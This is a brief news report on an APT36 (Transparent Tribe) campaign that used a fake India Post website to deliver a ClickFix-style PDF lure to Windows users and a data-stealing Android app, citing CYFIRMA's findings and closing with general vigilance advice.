APT36 Targets Indian Users with Fake India Post Website
A Pakistan-linked advanced persistent threat group known as APT36 or Transparent Tribe has been identified as the actor behind a fraudulent website impersonating India’s public postal system. The cyber campaign aims to infect both Windows and Android users in India with malware, according to cybersecurity firm CYFIRMA.
The fake website, postindia site, is designed to deceive visitors based on their device type. Windows users are prompted to download a malicious PDF, while Android users are served a compromised application package named indiapost apk.
Malware Delivery on Windows
When accessed from a desktop, the site delivers a PDF file containing a ClickFix-based attack. The document instructs users to press Win and R, paste a PowerShell command, and execute it. This action downloads a next-stage payload from a remote server, which is currently inactive.
An analysis of the metadata of the dropped PDF file reveals that it was created on October 23rd 2024 by an author named PMYLS, possibly referencing Pakistan’s Prime Minister Youth Laptop Scheme. The fake domain was later registered on November 2024.
Android Malware and Data Theft
When accessed from an Android device, the website encourages users to install an official mobile app for a better experience. Once installed, the malicious app requests extensive permissions, enabling it to harvest contact lists, track the user’s location, and access and exfiltrate files from external storage.
To evade detection, the app changes its icon to mimic a Google Accounts icon, making it difficult to locate and uninstall. Additionally, if a user denies permissions, the app forces them to accept.
The malware is also designed to run persistently in the background even after a device restart and bypass battery optimization settings to remain active at all times.
Growing Use of ClickFix Attacks
The ClickFix technique, which tricks users into manually executing malicious commands, is gaining popularity among cybercriminals and advanced persistent threat groups. CYFIRMA warns that this evolving tactic poses a significant risk as it can deceive both non technical and tech savvy users who may not recognize it as a cyber threat.
Organizations and individuals are advised to stay vigilant, avoid downloading unknown files, and scrutinize app permissions before installation.
